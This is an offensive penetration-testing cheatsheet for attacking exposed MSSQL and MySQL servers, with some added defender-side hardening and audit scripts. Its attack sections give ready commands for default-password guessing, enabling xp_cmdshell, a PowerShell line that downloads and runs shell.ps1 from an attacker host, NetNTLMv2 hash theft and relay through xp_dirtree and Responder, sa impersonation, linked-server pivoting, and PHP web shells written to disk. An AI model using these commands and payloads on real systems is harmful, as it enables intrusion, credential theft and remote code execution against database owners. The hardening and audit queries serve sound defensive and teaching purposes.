🛡️ Methodology Checklist
- Identify DB type (MSSQL/MySQL/PostgreSQL) from nmap or banner
- Test default/blank credentials
- If MSSQL: enable xp_cmdshell for OS command execution
- Check FILE privilege for LFI (MySQL)
- Write webshell via SELECT INTO OUTFILE (MySQL)
- NTLM capture via xp_dirtree (MSSQL): trigger Responder
- Enumerate linked servers for lateral movement
- Impersonation: if the login is not sysadmin, check IMPERSONATE rights and escalate with EXECUTE AS LOGIN
🎯 Operational Context
Use when: MSSQL or MySQL is exposed or accessible — default creds, xp_cmdshell for RCE, UDF injection, linked server abuse.
Think Dumber First: nxc mssql [TARGET] -u sa -p sa and nxc mssql [TARGET] -u sa -p '' — sa with blank or default password is common on unmanaged SQL installs. Then enable xp_cmdshell for OS command execution.
Skip when: SQL is only accessible via application — use SQL injection through the app instead of direct connection.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| nmap -Pn -sV -sC -p1433,3306 [TARGET_IP] | SQL service scan |
| mssqlclient.py -p 1433 [USER]@[TARGET_IP] | Connect to MSSQL from Linux (Impacket) |
| mssqlclient.py -windows-auth [DOMAIN]/[USER]:[PASS]@[TARGET_IP] | Connect to MSSQL with Windows auth |
| sqsh -S [TARGET_IP] -U .\[USER] -P '[PASS]' | Connect to MSSQL via sqsh (supports piping) |
| mysql -u [USER] -p[PASS] -h [TARGET_IP] | Connect to MySQL (no space after -p) |
| SHOW DATABASES; | MySQL: list databases |
| USE [db]; SHOW TABLES; | MySQL: list tables in database |
| SELECT name FROM master.dbo.sysdatabases; GO | MSSQL: list databases |
| SELECT table_name FROM [db].INFORMATION_SCHEMA.TABLES; GO | MSSQL: list tables |
| SELECT * FROM [table]; GO | Dump table contents |
| EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; | MSSQL: enable xp_cmdshell (requires sysadmin) |
| xp_cmdshell 'whoami'; | MSSQL: execute system command |
| EXEC master..xp_dirtree '\\[LHOST]\share\'; | MSSQL: steal service account NetNTLMv2 hash |
| SELECT DISTINCT b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; | MSSQL: check impersonation rights |
| EXECUTE AS LOGIN = 'sa'; | MSSQL: impersonate sa (if permitted) |
| SELECT srvname, isremote FROM sysservers; | MSSQL: list linked servers |
| EXECUTE('select @@servername') AT [LINKED_SERVER]; | MSSQL: execute on linked server |
| SELECT LOAD_FILE('/etc/passwd'); | MySQL: read file (requires FILE privilege) |
| SELECT "<?php system($_GET['c']); ?>" INTO OUTFILE '/var/www/html/shell.php'; | MySQL: write web shell to disk |
| sudo responder -I tun0 | Capture NTLM hash from xp_dirtree callback |
| hashcat -m 5600 hash.txt rockyou.txt | Crack captured NetNTLMv2 (mode 5600) |
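Added defender-side example for the LOAD_FILE and INTO OUTFILE rows above (not code from the original page): the MySQL checks that decide whether those two rows work at all, plus the grant to remove. The account name 'webapp'@'%' is a placeholder.

```sql
-- 1. File-system reach of LOAD_FILE and SELECT ... INTO OUTFILE.
--    ''     -> no restriction (the state the cheatsheet rows rely on)
--    NULL   -> file import/export disabled entirely
--    a path -> only that directory is reachable
SHOW VARIABLES LIKE 'secure_file_priv';

-- 2. Accounts holding the global FILE privilege that both operations require.
SELECT user, host FROM mysql.user WHERE File_priv = 'Y';

-- 3. Other global privileges that let an account reach the host, and the
--    directory a UDF library would have to be written into.
SELECT GRANTEE, PRIVILEGE_TYPE
FROM information_schema.USER_PRIVILEGES
WHERE PRIVILEGE_TYPE IN ('FILE', 'SUPER', 'SHUTDOWN', 'CREATE USER')
ORDER BY GRANTEE, PRIVILEGE_TYPE;
SHOW VARIABLES LIKE 'plugin_dir';   -- must not be writable by the mysqld OS user

-- 4. Remediation: application accounts get no FILE privilege (placeholder account).
--    secure_file_priv is read-only at runtime, so it is set in the server config:
--      [mysqld]
--      secure-file-priv = NULL
REVOKE FILE ON *.* FROM 'webapp'@'%';
```

With secure_file_priv set to NULL, both LOAD_FILE and INTO OUTFILE fail for every account regardless of FILE privilege, which is the setting to verify first when triaging a MySQL exposure.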
🔬 Deep Dive & Workflow
MSSQL Attack Progression
1. Connect (mssqlclient.py / sqsh)
2. Enumerate databases and tables
3. Dump sensitive data (users, creds, PII)
4. Check privilege level: SELECT IS_SRVROLEMEMBER('sysadmin')
5. If sysadmin → enable xp_cmdshell → OS command execution
6. If not sysadmin → check IMPERSONATE rights → escalate to sa
7. Check linked servers → chain to other DBs/hosts
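Added example (not part of the original cheatsheet): the defender-side review of what steps 4 to 7 enumerate, as one T-SQL script a sysadmin runs during hardening. It uses only the catalog views sys.server_principals, sys.server_role_members, sys.server_permissions, sys.servers and sys.linked_logins; the login and server names in the commented REVOKE and sp_droplinkedsrvlogin lines are placeholders.

```sql
-- 1. Who holds sysadmin? Every member can enable xp_cmdshell (step 5).
SELECT m.name AS member_login, m.type_desc, m.is_disabled
FROM sys.server_role_members rm
JOIN sys.server_principals r ON rm.role_principal_id = r.principal_id
JOIN sys.server_principals m ON rm.member_principal_id = m.principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.name;

-- 2. Who can impersonate whom? (step 6)
--    For class SERVER_PRINCIPAL, major_id is the principal_id of the login
--    being impersonated, so this returns the grantee/target pair and a
--    ready-made REVOKE for each one.
SELECT grantee.name AS can_impersonate,
       target.name  AS as_login,
       p.state_desc,
       'REVOKE IMPERSONATE ON LOGIN::' + QUOTENAME(target.name)
         + ' FROM ' + QUOTENAME(grantee.name) + ';' AS revoke_stmt
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON p.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals target  ON p.major_id = target.principal_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE';

-- 3. Linked servers and how this instance authenticates to them (step 7).
--    uses_self_credential = 1 passes the caller's own credentials through;
--    a fixed remote_name mapped to a privileged remote login is the
--    lateral-movement risk, because every local login shares it.
SELECT s.name AS linked_server, s.data_source, s.product,
       lp.name AS local_login, ll.uses_self_credential, ll.remote_name
FROM sys.servers s
LEFT JOIN sys.linked_logins ll ON s.server_id = ll.server_id
LEFT JOIN sys.server_principals lp ON ll.local_principal_id = lp.principal_id
WHERE s.is_linked = 1
ORDER BY s.name, lp.name;

-- Remediation pattern (placeholder names): drop the specific grant or mapping,
-- not the whole login, so the application keeps working.
-- REVOKE IMPERSONATE ON LOGIN::[sa] FROM [lowpriv_login];
-- EXEC sp_droplinkedsrvlogin @rmtsrvname = N'LINKED_SERVER', @locallogin = NULL;
```

The impersonation query differs from the cheatsheet's: it joins on major_id, so it returns who can impersonate whom rather than only the impersonatable logins, which is what is needed to write the REVOKE. In the linked-server output, a NULL local_login row is the default mapping that applies to every login not listed explicitly.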
xp_cmdshell — MSSQL OS Execution
A built-in extended stored procedure, disabled by default, but re-enabling it requires only the sysadmin role:
```sql
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
xp_cmdshell 'whoami';
xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\"http://[LHOST]/shell.ps1\")"';
```
xp_dirtree — NetNTLMv2 Hash Theft
Forces the MSSQL service account to authenticate to an attacker-controlled SMB share, where Responder captures the NetNTLMv2 hash:
```sql
-- On target (MSSQL)
EXEC master..xp_dirtree '\\[LHOST]\share\';
```
```bash
# On attacker (start before running the SQL)
sudo responder -I tun0
# Then crack
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
# Or relay if SMB signing is disabled on other targets
impacket-ntlmrelayx -t [OTHER_TARGET] -smb2support
```
MSSQL User Impersonation
```sql
-- Check who you can impersonate
SELECT DISTINCT b.name FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
-- Escalate
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER; -- verify: should return 'sa'
-- Now enable xp_cmdshell ('show advanced options' must be on first, or sp_configure rejects the option name)
EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;
```
MySQL File Operations
```sql
-- Read files (requires FILE privilege, and secure_file_priv must not exclude the path)
SELECT LOAD_FILE('/etc/passwd');
-- MSSQL equivalent (requires ADMINISTER BULK OPERATIONS / bulkadmin)
SELECT * FROM OPENROWSET(BULK N'C:/Windows/win.ini', SINGLE_CLOB) AS Contents;
-- Write web shell (requires FILE privilege and write access to the web root for the mysqld OS user)
SELECT "<?php system($_GET['c']); ?>" INTO OUTFILE '/var/www/html/shell.php';
```
MSSQL Write File (Ole Automation)
Also sysadmin-only, since 'Ole Automation Procedures' is itself an advanced configuration option; writes to disk as the SQL Server service account:
```sql
sp_configure 'show advanced options', 1; RECONFIGURE;
sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
DECLARE @OLE INT; DECLARE @FileID INT;
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT;
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\shell.php', 8, 1;
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>';
EXECUTE sp_OADestroy @FileID; EXECUTE sp_OADestroy @OLE;
```
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| xp_cmdshell disabled | Default secure configuration | Enable: EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; |
| MSSQL connection refused | Non-standard port or named instance | Enumerate instances: nmap -p 1433,1434 --script ms-sql-info [TARGET]; try UDP 1434 for browser service |
| impacket-mssqlclient auth fails | Windows auth vs SQL auth mismatch | Try both: -windows-auth flag for Windows auth; without for SQL auth |
| MySQL UDF injection fails | Plugin dir not writable | Check: SHOW VARIABLES LIKE 'plugin_dir'; requires write permission to that path |
| Linked server commands fail | Permissions on linked server | Use OPENQUERY: SELECT * FROM OPENQUERY([LINKED_SERVER], 'SELECT SYSTEM_USER') |
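Added example, not from the original page: the T-SQL a defender runs to find and close the configuration options used in the xp_cmdshell and Ole Automation sections above. It assumes sysadmin rights and uses only the sys.configurations view and sp_configure.

```sql
-- Configuration options that turn a sysadmin login into OS or file-system access.
-- 'Ad Hoc Distributed Queries' is listed because it enables OPENROWSET/OPENDATASOURCE
-- from any login; 'clr enabled' is listed for review only (disabling it breaks CLR assemblies in use).
-- value = configured setting, value_in_use = running setting: a mismatch means
-- someone changed the option but RECONFIGURE has not run yet.
SELECT name, value AS configured_value, value_in_use, is_advanced
FROM sys.configurations
WHERE name IN ('xp_cmdshell',
               'Ole Automation Procedures',
               'Ad Hoc Distributed Queries',
               'clr enabled',
               'show advanced options')
ORDER BY name;

-- Turn the dangerous ones off. 'show advanced options' must be on while the
-- others are changed, then is switched back off. That last step only hides the
-- options from sp_configure; any sysadmin can still re-enable them, which is why
-- trimming sysadmin membership matters as much as this script.
EXEC sp_configure 'show advanced options', 1;      RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;                RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0;  RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;      RECONFIGURE;

-- Verify: every row should now show value_in_use = 0.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'Ad Hoc Distributed Queries');
```

Run the first SELECT on a schedule (or from a central job across instances) and alert on any row where value_in_use = 1; a change here is also written to the SQL Server error log as "Configuration option 'xp_cmdshell' changed from 0 to 1", which gives a second place to detect it.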
📝 Reporting Trigger
Finding Title: SQL Server xp_cmdshell Enables Operating System Command Execution
Impact: Enabled xp_cmdshell on MSSQL Server allows any authenticated SQL user to execute arbitrary OS commands as the SQL service account, enabling lateral movement, credential dumping, and persistence without additional exploitation.
Root Cause: xp_cmdshell enabled on MSSQL instance. SQL Server service account running with excessive OS privileges.
Recommendation: Disable xp_cmdshell and all advanced dangerous options. Run SQL Server as a dedicated low-privilege service account. Implement SQL Server Audit to log all DDL and configuration changes. Restrict SQL access to application accounts only.
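Added example of the "Implement SQL Server Audit" recommendation (not part of the original page): a server audit and specification that record the actions this page's attack chain leaves behind, and a query to review them. The file path and the audit names are placeholders; the SQL Server service account needs write access to the path.

```sql
USE master;

-- Server-level audit writing to rolling files (placeholder path).
CREATE SERVER AUDIT [Audit_PrivilegedActivity]
    TO FILE (FILEPATH = N'C:\SQLAudit\', MAXSIZE = 256 MB, MAX_ROLLOVER_FILES = 20)
    WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE);

-- Action groups chosen for the chain on this page:
--   SERVER_OPERATION_GROUP               -> ALTER SETTINGS, i.e. sp_configure/RECONFIGURE
--                                           (xp_cmdshell, Ole Automation Procedures)
--   SERVER_PRINCIPAL_IMPERSONATION_GROUP -> EXECUTE AS LOGIN
--   SERVER_ROLE_MEMBER_CHANGE_GROUP      -> a login being added to sysadmin
--   SERVER_OBJECT_CHANGE_GROUP           -> linked servers created, altered or dropped
--   SUCCESSFUL_LOGIN_GROUP / FAILED_LOGIN_GROUP -> sa guessing and blank-password use
--   AUDIT_CHANGE_GROUP                   -> tampering with this audit itself
CREATE SERVER AUDIT SPECIFICATION [AuditSpec_PrivilegedActivity]
FOR SERVER AUDIT [Audit_PrivilegedActivity]
    ADD (SERVER_OPERATION_GROUP),
    ADD (SERVER_PRINCIPAL_IMPERSONATION_GROUP),
    ADD (SERVER_ROLE_MEMBER_CHANGE_GROUP),
    ADD (SERVER_OBJECT_CHANGE_GROUP),
    ADD (SUCCESSFUL_LOGIN_GROUP),
    ADD (FAILED_LOGIN_GROUP),
    ADD (AUDIT_CHANGE_GROUP)
WITH (STATE = ON);

ALTER SERVER AUDIT [Audit_PrivilegedActivity] WITH (STATE = ON);

-- Review: configuration changes, impersonation and extended-procedure use in the
-- last 24 hours. session_server_principal_name is the real login; a differing
-- server_principal_name shows an EXECUTE AS context in effect.
SELECT event_time, action_id, succeeded,
       session_server_principal_name, server_principal_name,
       object_name, statement
FROM sys.fn_get_audit_file(N'C:\SQLAudit\*', DEFAULT, DEFAULT)
WHERE event_time > DATEADD(HOUR, -24, SYSUTCDATETIME())
  AND (statement LIKE '%sp_configure%'
       OR statement LIKE '%EXECUTE AS LOGIN%'
       OR statement LIKE '%xp_cmdshell%'
       OR statement LIKE '%xp_dirtree%')
ORDER BY event_time DESC;
```

ON_FAILURE = CONTINUE keeps the instance up if the audit target fills; switch it to SHUTDOWN only where losing audit records is considered worse than an outage. Ship the audit files to a SIEM rather than reading them only on the host, since a sysadmin who reached xp_cmdshell can also delete them locally.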